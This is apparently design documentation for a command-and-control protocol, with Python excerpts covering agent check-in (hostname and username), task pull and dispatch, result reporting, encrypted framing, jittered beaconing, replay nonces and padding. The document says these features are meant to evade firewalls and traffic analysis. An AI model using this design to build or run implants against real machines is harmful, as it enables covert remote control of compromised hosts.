
Protocol Overview

The C2 protocol uses a binary message format with encrypted payloads. All communication happens over HTTPS through a single /beacon endpoint, with agents initiating all connections to avoid firewall restrictions.

Message Format

Each message is wrapped in a binary envelope with the following structure:
Wire format (7-byte header + body):
    [ magic: 2B | version: 1B | length: 4B | nonce: 12B | ciphertext+tag ]

Struct format '!HBI': big-endian, uint16 + uint8 + uint32.
common/message_format.py
def pack(payload_dict: dict, key: bytes) -> bytes:
    """Serialise, encrypt, and frame a payload dict into a C2 envelope."""
    if not payload_dict or not isinstance(payload_dict, dict):
        raise ProtocolError("pack: payload_dict must be a non-empty dict")

    try:
        plaintext = json.dumps(payload_dict).encode('utf-8')
    except (TypeError, ValueError) as e:
        raise ProtocolError(f"pack: payload not JSON-serialisable: {e}") from e

    # Apply padding before encryption to obscure plaintext length
    profile   = load_active_profile()
    plaintext = pad(plaintext, profile.padding_min, profile.padding_max)

    ciphertext_with_tag, nonce = encrypt(plaintext, key)

    # nonce prepended to body so receiver can split at fixed offset [:12]
    body   = nonce + ciphertext_with_tag
    header = struct.pack(HEADER_FORMAT, MAGIC, PROTOCOL_VERSION, len(body))
    return header + body
Header Fields:
  • magic (2 bytes): Protocol identifier (0xC2C2)
  • version (1 byte): Protocol version (0x01)
  • length (4 bytes): Length of the body in bytes (nonce + ciphertext + tag), excluding the 7-byte header
Body Structure:
  • nonce (12 bytes): Random nonce for AES-GCM encryption
  • ciphertext+tag: Encrypted JSON payload with 16-byte authentication tag
The nonce is carried at the start of the body rather than in the header. This keeps the header at a fixed 7 bytes, and once the receiver has read the body it can split off the nonce at a fixed offset (body[:12]) with no further parsing.
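The framing described above can be checked on the receiving side before any decryption is attempted. The following is a minimal sketch, assuming the constants shown in the header field list; the function name split_envelope and the use of ValueError are illustrative and are not taken from common/message_format.py.

```python
import struct
from typing import Tuple

HEADER_FORMAT = "!HBI"                        # magic, version, body length
HEADER_SIZE = struct.calcsize(HEADER_FORMAT)  # 2 + 1 + 4 = 7 bytes
MAGIC = 0xC2C2
PROTOCOL_VERSION = 0x01
NONCE_SIZE = 12   # AES-GCM nonce
TAG_SIZE = 16     # AES-GCM authentication tag


def split_envelope(frame: bytes) -> Tuple[bytes, bytes]:
    """Validate the header and return (nonce, ciphertext_with_tag).

    Hypothetical helper: it only checks framing and does not decrypt.
    """
    if len(frame) < HEADER_SIZE:
        raise ValueError("frame shorter than the 7-byte header")

    magic, version, length = struct.unpack(HEADER_FORMAT, frame[:HEADER_SIZE])
    if magic != MAGIC:
        raise ValueError(f"bad magic 0x{magic:04X}")
    if version != PROTOCOL_VERSION:
        raise ValueError(f"unsupported version {version}")

    body = frame[HEADER_SIZE:]
    if len(body) != length:
        raise ValueError("length field does not match body size")
    if length < NONCE_SIZE + TAG_SIZE:
        raise ValueError("body too short to hold nonce and tag")

    # The nonce sits at a fixed offset at the start of the body.
    return body[:NONCE_SIZE], body[NONCE_SIZE:]
```

Rejecting frames on magic, version, and length first means malformed input is discarded cheaply, before the authenticated decryption step runs.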

Message Types

The protocol defines six message types:
common/message_format.py
MSG_CHECKIN       = 'CHECKIN'
MSG_TASK_PULL     = 'TASK_PULL'
MSG_TASK_RESULT   = 'TASK_RESULT'
MSG_TASK_DISPATCH = 'TASK_DISPATCH'
MSG_HEARTBEAT     = 'HEARTBEAT'
MSG_TERMINATE     = 'TERMINATE'

CHECKIN

Direction: Agent → Server
Purpose: Register a new agent session
common/message_format.py
def build_checkin(hostname: str, username: str, os_info: str,
                  agent_ver: str, jitter_pct: int) -> dict:
    """Build a CHECKIN payload dict."""
    msg = _base_payload(MSG_CHECKIN)
    msg['payload'] = {
        'hostname':   hostname,
        'username':   username,
        'os':         os_info,
        'agent_ver':  agent_ver,
        'jitter_pct': jitter_pct,
    }
    return msg
Response: Server assigns a session_id (UUID) and returns it to the agent.

TASK_PULL

Direction: Agent → Server
Purpose: Request next pending command
common/message_format.py
def build_task_pull(session_id: str) -> dict:
    """Build a TASK_PULL payload dict."""
    msg = _base_payload(MSG_TASK_PULL, session_id=session_id)
    msg['payload'] = {'session_id': session_id}
    return msg
Response: Server responds with one of:
  • TASK_DISPATCH if a command is queued
  • TASK_PULL with status: no_task if the queue is empty
  • TERMINATE if the session has been deactivated

TASK_DISPATCH

Direction: Server → Agent
Purpose: Send a command for execution
server/server_main.py
resp = mf._base_payload(mf.MSG_TASK_DISPATCH, session_id=session_id)
resp['payload'] = {
    'task_id':   task.task_id,
    'command':   task.command,
    'args':      task.args,
    'timeout_s': task.timeout_s,
}

TASK_RESULT

Direction: Agent → Server
Purpose: Report command execution results
common/message_format.py
def build_task_result(session_id: str, task_id: str, stdout: str,
                      stderr: str, exit_code: int, duration_ms: int) -> dict:
    """Build a TASK_RESULT payload dict."""
    msg = _base_payload(MSG_TASK_RESULT, session_id=session_id)
    msg['payload'] = {
        'task_id':     task_id,
        'stdout':      stdout,
        'stderr':      stderr,
        'exit_code':   exit_code,
        'duration_ms': duration_ms,
    }
    return msg

HEARTBEAT

Direction: Agent → Server (optional)
Purpose: Keep session alive without pulling tasks

TERMINATE

Direction: Server → Agent
Purpose: Instruct agent to shut down gracefully
The TERMINATE signal is sent when an operator deactivates a session. The agent receives it on the next beacon and calls sys.exit(0).

Base Payload Structure

All messages include mandatory fields:
common/message_format.py
def _base_payload(msg_type: str, session_id: str = None) -> dict:
    """Return mandatory fields present in every message."""
    if msg_type not in VALID_MSG_TYPES:
        raise ProtocolError(f"unknown msg_type '{msg_type}'")
    return {
        'msg_type':   msg_type,
        'session_id': session_id,
        'timestamp':  int(time.time()),
        'nonce':      uuid.uuid4().hex,   # replay protection
        'payload':    {},
    }
  • msg_type: One of the six defined message types
  • session_id: UUID assigned during CHECKIN (null for CHECKIN message)
  • timestamp: Unix timestamp when message was created
  • nonce: Random UUID hex string for replay protection
  • payload: Message-specific data
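The mandatory fields listed above can be verified on receipt with a small structural check. This is a sketch only: validate_base_payload is a hypothetical name, the contents of VALID_MSG_TYPES are assumed to be the six constants defined earlier, and the rule that only CHECKIN may carry a null session_id is inferred from the field description rather than confirmed by the source.

```python
REQUIRED_FIELDS = ("msg_type", "session_id", "timestamp", "nonce", "payload")

# Assumed to mirror the six MSG_* constants in common/message_format.py.
VALID_MSG_TYPES = {
    "CHECKIN", "TASK_PULL", "TASK_RESULT",
    "TASK_DISPATCH", "HEARTBEAT", "TERMINATE",
}


def validate_base_payload(msg: dict) -> None:
    """Raise ValueError if a decoded message lacks the mandatory structure."""
    missing = [name for name in REQUIRED_FIELDS if name not in msg]
    if missing:
        raise ValueError(f"missing mandatory fields: {missing}")

    if msg["msg_type"] not in VALID_MSG_TYPES:
        raise ValueError(f"unknown msg_type {msg['msg_type']!r}")

    # Assumption: session_id may be null only before a session exists.
    if msg["session_id"] is None and msg["msg_type"] != "CHECKIN":
        raise ValueError("session_id is required for this msg_type")

    if not isinstance(msg["timestamp"], int):
        raise ValueError("timestamp must be an integer Unix time")

    if not isinstance(msg["payload"], dict):
        raise ValueError("payload must be a dict")
```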

Beacon Loop

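The agent’s main execution loop is implemented in the BeaconLoop class. Because every later message carries a session_id, the agent first registers with the server through the _checkin method: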
agent/beacon.py
def _checkin(self) -> None:
    # Send CHECKIN and store the session_id assigned by the server.
    global logger

    payload  = _build_checkin_payload()
    response = _send(payload, self._key)

    self._session_id = (
        response.get('session_id') or
        response.get('payload', {}).get('session_id')
    )

    if not self._session_id:
        raise TransportError(
            'CHECKIN response missing session_id — server may have rejected checkin'
        )

    # Re-create logger with session_id so all subsequent logs are tagged
    logger = update_session(logger, self._session_id)

    logger.info('checkin complete', extra={
        'session_id': self._session_id,
        'hostname':   platform.node(),
    })
Loop Flow:
  1. Sleep with jitter — Agent sleeps for BEACON_INTERVAL_S ± jitter
  2. Send TASK_PULL — Agent requests next command from server
  3. Process response:
    • If TASK_DISPATCH: Execute command and send TASK_RESULT
    • If TERMINATE: Exit cleanly with sys.exit(0)
    • If no task: Continue to next iteration
  4. Error handling:
    • Network errors trigger exponential back-off
    • Unexpected errors are logged but don’t crash the loop

Exponential Back-off

The agent implements retry logic with exponential back-off to handle network failures gracefully:
agent/beacon.py
class BackoffManager:
    # Manages exponential back-off state for retry logic

    _SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds, capped at 60

    def __init__(self):
        self.attempts = 0

    def compute_delay(self) -> float:
        # Return the delay for the current attempt, capped at the last sequence value.
        return float(self._SEQUENCE[min(self.attempts, len(self._SEQUENCE) - 1)])

    def reset(self) -> None:
        # Reset attempt counter after a successful operation.
        self.attempts = 0
Back-off Sequence: 1s → 2s → 4s → 8s → 16s → 32s → 60s (capped)
The back-off counter is reset after any successful beacon, so the next failure starts again at 1s rather than continuing from the previous delay.
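The excerpt above does not show where attempts is incremented. The sketch below reproduces the class and adds a record_failure method to illustrate one way the counter could advance; record_failure and delays_for_failures are hypothetical names and are not taken from agent/beacon.py.

```python
from typing import List


class BackoffManager:
    """Back-off state, as in the excerpt, plus a hypothetical failure hook."""

    _SEQUENCE = [1, 2, 4, 8, 16, 32, 60]  # delay steps in seconds, capped at 60

    def __init__(self) -> None:
        self.attempts = 0

    def compute_delay(self) -> float:
        # Clamp the index so every attempt past the end reuses the 60s cap.
        return float(self._SEQUENCE[min(self.attempts, len(self._SEQUENCE) - 1)])

    def record_failure(self) -> float:
        # Hypothetical: return the delay for this failure, then advance.
        delay = self.compute_delay()
        self.attempts += 1
        return delay

    def reset(self) -> None:
        self.attempts = 0


def delays_for_failures(count: int) -> List[float]:
    """Return the delays chosen across `count` consecutive failures."""
    backoff = BackoffManager()
    return [backoff.record_failure() for _ in range(count)]
```

With nine consecutive failures, delays_for_failures(9) yields the seven steps of the sequence followed by two more 60-second delays, since the index is clamped to the last entry.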

Replay Protection

Each message includes a unique nonce (the UUID hex string in the base payload, distinct from the 12-byte AES-GCM nonce in the envelope) that the server stores and checks:
server/server_main.py
# Step 3 — nonce replay check
if not await db.check_and_store_nonce(nonce):
    logger.warning('replay detected', extra={
        'session_id': session_id,
        'nonce':      nonce,
    })
    return JSONResponse(status_code=409, content={'error': 'replay detected'})
If a nonce is seen twice, the server rejects the message with a 409 Conflict status code.
Why UUIDs for nonces?
UUIDs provide 122 bits of entropy (version 4), making collisions astronomically unlikely even with billions of messages. This eliminates the need for synchronized counters between agent and server.
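The check-and-store behaviour can be illustrated with an in-memory stand-in for the database call. This is a sketch under stated assumptions: InMemoryNonceStore is a hypothetical class, and only the method name check_and_store_nonce and its boolean result (False on a repeat) are taken from the server excerpt. A real store would also need persistence and some policy for expiring old nonces, which the source does not describe.

```python
import asyncio
from typing import Set


class InMemoryNonceStore:
    """Hypothetical stand-in for db.check_and_store_nonce."""

    def __init__(self) -> None:
        self._seen: Set[str] = set()

    async def check_and_store_nonce(self, nonce: str) -> bool:
        """Return True the first time a nonce is seen, False on any repeat."""
        # There is no await between the membership test and the insert, so
        # the two steps cannot interleave with other tasks on the same loop.
        if nonce in self._seen:
            return False
        self._seen.add(nonce)
        return True


async def demo() -> tuple:
    store = InMemoryNonceStore()
    first = await store.check_and_store_nonce("a" * 32)
    replay = await store.check_and_store_nonce("a" * 32)
    other = await store.check_and_store_nonce("b" * 32)
    return first, replay, other
```

Combining the check and the store in one operation matters: if they were separate calls, two copies of the same message arriving together could both pass the check before either was recorded.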

Padding Strategy

To hinder traffic analysis based on message size, the protocol applies random padding before encryption:
common/message_format.py
# Apply padding before encryption to obscure plaintext length
profile   = load_active_profile()
plaintext = pad(plaintext, profile.padding_min, profile.padding_max)
The padding is stripped after decryption, ensuring the receiver gets the original plaintext.
Padding obscures the true size of commands and results, making it harder for network observers to infer the type of activity occurring.
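The source does not show how pad marks where the original plaintext ends. One common approach, sketched here purely as an assumption, is to prefix the plaintext with its length so the receiver can discard the trailing random bytes. Only the pad(plaintext, padding_min, padding_max) signature comes from the excerpt; the length prefix and the unpad function are illustrative.

```python
import os
import secrets
import struct

LENGTH_PREFIX = "!I"                              # assumed 4-byte big-endian length
PREFIX_SIZE = struct.calcsize(LENGTH_PREFIX)      # 4 bytes


def pad(plaintext: bytes, padding_min: int, padding_max: int) -> bytes:
    """Append a random number of random bytes, within [padding_min, padding_max]."""
    if not 0 <= padding_min <= padding_max:
        raise ValueError("require 0 <= padding_min <= padding_max")
    pad_len = padding_min + secrets.randbelow(padding_max - padding_min + 1)
    return struct.pack(LENGTH_PREFIX, len(plaintext)) + plaintext + os.urandom(pad_len)


def unpad(padded: bytes) -> bytes:
    """Recover the original plaintext by reading the length prefix."""
    if len(padded) < PREFIX_SIZE:
        raise ValueError("padded data shorter than length prefix")
    (length,) = struct.unpack(LENGTH_PREFIX, padded[:PREFIX_SIZE])
    if length > len(padded) - PREFIX_SIZE:
        raise ValueError("length prefix exceeds available data")
    return padded[PREFIX_SIZE:PREFIX_SIZE + length]
```

Because padding is applied before encryption, both the length prefix and the padding bytes are covered by the AES-GCM tag, so tampering with either is detected at decryption.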
